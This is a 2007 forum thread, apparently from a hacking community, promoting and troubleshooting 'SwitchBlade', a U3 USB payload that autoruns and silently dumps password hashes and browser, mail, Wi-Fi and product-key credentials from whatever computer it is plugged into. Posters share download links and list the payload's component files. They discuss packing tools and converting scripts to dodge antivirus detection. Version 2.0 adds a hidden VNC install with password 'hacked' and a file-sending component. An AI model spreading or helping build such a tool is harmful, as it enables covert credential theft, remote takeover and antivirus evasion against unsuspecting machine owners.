setzer1411 Posted May 30, 2007 Share Posted May 30, 2007 THIS IS A POST FOR -=GonZor=- HE IS HAVING TROUBLE POSTING DUE TO THE ATTACKS ON THE SERVERS THIS IS QUOTED VERBATIM OF WHAT HE WANTED TO POST Here is a link to my payload http://www.users.on.net/~simmo_89/switchblade/Index.html Here is a mirror for my payload http://rapidshare.com/files/34270702/GonZors_SwitchBlade.zip Yes I know what you all thinking, How is this different to any other payload? Well basically my payload has an advantage over others because the payload is on the CD Partition so it is protected and cannot be deleted. It can be easily and fully customized by using an app I made (SBConfig.exe) The site at the moment has a very basic installation guide on it but tomorrow i will be creating a better page with a better explanation, if you would just bare with me till this is done, i will also answer a lot of your questions on here because due to the attacks on the servers I am having trouble posting. Quote Link to comment Share on other sites More sharing options...
setzer1411 Posted May 30, 2007 Author Share Posted May 30, 2007 if anyone has trouble with the rapidshare download let me know and il do my best to fix it. just pm me or email me setzer1411@gmail.com Quote Link to comment Share on other sites More sharing options...
lixo Posted May 31, 2007 Share Posted May 31, 2007 Hello, Thanks for posting Gozor's payload and thank you Gozor for sharing :smile: I've flashed my CD partition and when I execute SBconfig. exe I get this error: Run time error 76 Path not found And yes I did put SBConfig. exe in the flash partition as per the instructions on the site. Any idea of what I'm doing wrong. What path does it have problems finding? Also as you all know mailpv. exe is detected by most AV so you might want to disable it when installing. Now only to find a nice unknown packer to make mailpv undetectable. . . Quote Link to comment Share on other sites More sharing options...
lixo Posted June 1, 2007 Share Posted June 1, 2007 Hi GonZor, I'm glad you were able to fix the runtime error. Thanks again for sharing, I do like your payload a lot. I have a few more bugs to report: After flashing the CD partition everything seems to go well until I plug the cruzer back in. Then I get a window that says the following: Windows - No Disk There is no disk in the drive. Please insert a disk into drive. Cancel, Try Again, Continue I have to click cancel 3 times to get rid of the error message. After that I can access the flash partition fine and load SBConfig and execute it. When I then unplug and plug back in the cruzer the message pops back up. This time I click cancel 3 times and it goes away for a few seconds but keeps popping back up in a never ending loop. Now I believe this happens because the payload is executing all the different goodies and each access pops up the error message. However it does work and produces a nice big logfile. This happens on my XP Pro SP2 English fully patched stand alone machine running as admin user. Hope this helps in improving this nice payload. Cheers EDIT: The same problem regarding the disk error also happens with Windows Server 2003 English Quote Link to comment Share on other sites More sharing options...
GonZor Posted June 3, 2007 Share Posted June 3, 2007 Finally i can post, there is a fix on the site for the SBConfig "Run time error 76" just visit the FAQ I have a few more bugs to report: After flashing the CD partition everything seems to go well until I plug the cruzer back in. Then I get a window that says the following: Windows - No Disk There is no disk in the drive. Please insert a disk into drive. Cancel, Try Again, Continue I have to click cancel 3 times to get rid of the error message. After that I can access the flash partition fine and load SBConfig and execute it. When I then unplug and plug back in the cruzer the message pops back up. This time I click cancel 3 times and it goes away for a few seconds but keeps popping back up in a never ending loop. Now I believe this happens because the payload is executing all the different goodies and each access pops up the error message. However it does work and produces a nice big logfile. This happens on my XP Pro SP2 English fully patched stand alone machine running as admin user. Hope this helps in improving this nice payload. Cheers EDIT: The same problem regarding the disk error also happens with Windows Server 2003 English If anyone has any more info on this it would be appreciated, the only thing i can think of is an error occured when you flashed your drive, i have done this to multiple drives without any errors Quote Link to comment Share on other sites More sharing options...
lixo Posted June 5, 2007 Share Posted June 5, 2007 Me again. It is pretty strange. Some machines give me the disk error message, others don't. I can't figure out what is causing this. I've tried flashing it again and still same problem. Maybe I'll try flashing it in another computer to see if anything changes. I will keep you posted. Quote Link to comment Share on other sites More sharing options...
ASTRAPI Posted June 7, 2007 Share Posted June 7, 2007 It doesn't autostart for me only when i double click to the flash drive it works great. Any idea how to fix this? I think the problem is on the files in the cd partition from my flash disk. If anyone can post the correct files or can help me about the correct setting it will be great. Thanks Quote Link to comment Share on other sites More sharing options...
GonZor Posted June 8, 2007 Share Posted June 8, 2007 When you say "It doesn't autostart for me" which part are you referring to? Here is a list of files that should be on the CD partition of your drive, make sure all the files are there - autorun.inf - go.vbs - launchpad.zip - launchu3.exe - start.bat - SRCduh.vbs - SRCgo.bat - SRCiepv.exe - SRClsaext.dll - SRCmailpv.exe - SRCmspass.exe - SRCnetpass.exe - SRCprodukey.exe - SRCpspv.exe - SRCpwdump.exe - SRCpwservice.exe - SRCwifike.exe - SRCcachedump.exe - SRCfirepassword.exe - SRCnspr4.dll - SRCnss3.dll - SRCplc4.dll - SRCplds4.dll - SRCsoftokn3.dll - SRCportqry.exe - SRCwul.exe you may need to re run SBConfig.exe (make sure you have updated to the latest version of SBConfig.exe it should be V1.0.11) depending of course on what specifically the problem is, also are you sure that the computer you are testing on auto runs a U3 drive? these are just a few thoughts if you have any more information I will do my best to fix the problem Quote Link to comment Share on other sites More sharing options...
ASTRAPI Posted June 8, 2007 Share Posted June 8, 2007 Ops it works my mistake.Sorry. I will use the latest sbconfig to take out some services that i don't need. Great job my friend. Thank you so much . Quote Link to comment Share on other sites More sharing options...
GonZor Posted June 8, 2007 Share Posted June 8, 2007 No problem, I will also suggest to everyone using my payload make sure you have updated to the latest release of SBConfig.exe - V1.0.11. This contains no known bugs unlike previous releases. Quote Link to comment Share on other sites More sharing options...
setzer1411 Posted June 8, 2007 Author Share Posted June 8, 2007 Very nice work, here are rapidshare links for the New SB Config and the Universal Customizer... http://rapidshare.com/files/35933462/SBConfig.zip http://rapidshare.com/files/35933634/Unive..._Customizer.zip I will upload the Payload when I get off work (the AV here throws a fit when I download it lol). I hope everyone enjoys this and be sure to thank Gonzor for his contribution, this is an outstanding setup. If you have any questions or comments feel free to email me at setzer1411@gmail.com Quote Link to comment Share on other sites More sharing options...
setzer1411 Posted June 9, 2007 Author Share Posted June 9, 2007 http://rapidshare.com/files/36065435/GonZo...hBlade-V1.2.zip The new Payload, enjoy =P Quote Link to comment Share on other sites More sharing options...
GonZor Posted June 9, 2007 Share Posted June 9, 2007 Thanks for the linkage setzer, If any one has any problems, questions, comments, ideas, or anything to do with the payload email me at gonzor228@gmail.com and I will get back to you asap If the rapid share links are broken either email me or setzer and one of us will fix them Quote Link to comment Share on other sites More sharing options...
GonZor Posted June 11, 2007 Share Posted June 11, 2007 Would people like an exe in place of go.cmd? Let me know your thoughts Quote Link to comment Share on other sites More sharing options...
atkinchris Posted June 13, 2007 Share Posted June 13, 2007 Firstly: thanks for taking a very useful tool and making it better! I was just thinking about that today GonZor, because when I attempted to use it on a number of systems, although the tools didn't get flagged by AV (I don't use the MailPV option) the scripts did, purely for script permissions, not as unwanted programs (tested on McAfee and Norton). An . exe would slide past these innocently. . . hxxp: renegadetech. blogspot. com/2006/07/how-to-convert-bat-file-or-vbs-file. html That's from a quick Google. . . requires only tools freely available in Windows XP! On a side note: I have a Sandisk Cruzer 2GB, and although U3 didn't start on Vista (It was disabled I found :P) your payload did. . . presenting me with a complete log, spare the PWDump log (try FGDump. . . it's Vista compatible, and provides far more functions). The latest PWDump6 is supposedly Vista compatible too, but I haven't tried it. Regards, Chris Quote Link to comment Share on other sites More sharing options...
elmer Posted June 15, 2007 Share Posted June 15, 2007 I am fine with either. Nice work on the payload, I was actually planning on making the same thing! You beat me to it, though now I don't have to code it up! Yay! Quote Link to comment Share on other sites More sharing options...
7even Sins Posted June 17, 2007 Share Posted June 17, 2007 Hello,All @ GonZor Thanks for all the hard work you put in to this. may I ask are you going to add the Switchblade ? to your own tool. if so may I ask when don't want to miss this one ;) anyways I will be keeping an eye on this Thread. Best of luck 7Sins Quote Link to comment Share on other sites More sharing options...
elmer Posted June 17, 2007 Share Posted June 17, 2007 Uh... this is a switchblade. What are you talking about? Quote Link to comment Share on other sites More sharing options...
GonZor Posted June 17, 2007 Share Posted June 17, 2007 Sorry I haven't replied in a while I've been fairly busy. ...the scripts did, purely for script permissions, not as unwanted programs (tested on McAfee and Norton). An . exe would slide past these innocently. . . hxxp: renegadetech. blogspot. com/2006/07/how-to-convert-bat-file-or-vbs-file. html unfortunately that would not convert it to an exe, it would create a self extracting archive with a bat inside, and would not solve your problem. I am working on rewriting everything into an exe. try FGDump. . . it's Vista compatible, and provides far more functions. Thanks for the suggestion, I will swap pwdump for fgdump in the next release are you going to add the Switchblade ? to your own tool. I'm going to assume you meant HakSaw? Yes I am currently working on V2.0 that will include a lot more, mostly functions that will infect the computer like HakSaw and VNC. I have also added a function to dump the external IP to the log if it is connected to the internet. I am currently having trouble with the HakSaw I have never used it before, I have the installation to work properly but It will not send the files. I have also tested with the original payload and cannot get it to send. Please email any ideas to gonzor228@gmail.com. Quote Link to comment Share on other sites More sharing options...
GonZor Posted June 19, 2007 Share Posted June 19, 2007 Version 2.0 Released I have just finished upload V2.0 I have not had a chance to test the VNC so feedback is needed. The Hacksaw component wont start until the user logs on next (it was pausing the payload). I am about to create an update log to give more details. Ok whats new? not much unfortunately :( but on the plus side no editing a batch file to setup the HakSaw :-P - Dump External IP to the log file (props to Marc for ip.shtml) - Install VNC (untested, it installs but didnt have a chance to test connection) - HakSaw (Doesn't run until the user logs on next) Once again check the site for the payload http://www.users.on.net/~simmo_89/switchblade/Index.html EDIT - I just realized I'm an idiot, the password for VNC is hacked Quote Link to comment Share on other sites More sharing options...
setzer1411 Posted June 19, 2007 Author Share Posted June 19, 2007 nicely done, il test it when i get home Quote Link to comment Share on other sites More sharing options...
setzer1411 Posted June 20, 2007 Author Share Posted June 20, 2007 WOW after i load my apps into the iso (to keep them safe on cd side) the iso is 994mb that is kinda mean to the usb drive... lol very nice setup but I honestly believe you should team up with Leapo =P Quote Link to comment Share on other sites More sharing options...
elmer Posted June 20, 2007 Share Posted June 20, 2007 Quote Link to comment Share on other sites More sharing options...
trustme Posted June 21, 2007 Share Posted June 21, 2007 @ setzer and all the others who keep insisting they combine payloads GonZor’s payload is amazing on its own; there is no reason to combine it with leapo’s. I can’t think of anything leapo’s payload can do that GonZor’s can’t (or can't be added as a package) besides function on a non-U3 drive. As Gonzor said, he is going to add support for that when he gets time, and you can’t just copy and paste Leapo’s code into GonZor’s. They would still have to be kept separate, a U3 and a non-U3 version which is basically how things are now. GonZors payload has the advantage of the built in protection of the cd rom drive as well as his ability to turn parts of the package on and off using a gui. As far as creativity goes, it’s not like either is barring the other from using their code or ideas. I think its pointless to combine them under one name. Can anyone give a good reason why they should team up? Quote Link to comment Share on other sites More sharing options...
setzer1411 Posted June 21, 2007 Author Share Posted June 21, 2007 simple, if they were creative enough to come up with each payload on their own (as individuals) wouldn't it be feasible for the to combine efforts and make a superior product? Example: 1(an individual)+1(another individual)=2(greater than any single individual) Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.